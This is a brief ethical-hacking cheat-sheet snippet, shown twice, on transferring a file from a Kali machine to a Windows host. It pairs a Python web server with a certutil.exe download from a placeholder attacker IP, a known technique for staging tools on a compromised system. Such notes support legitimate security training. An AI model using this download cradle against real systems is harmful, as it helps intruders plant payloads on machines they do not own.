On Kali, start a python webserver
python3 -m http.server 80
Then, download the file on windows
certutil.exe -urlcache -f http://<KALI_IP>/file file
Learn ethical hacking
On Kali, start a python webserver
python3 -m http.server 80
Then, download the file on windows
certutil.exe -urlcache -f http://<KALI_IP>/file file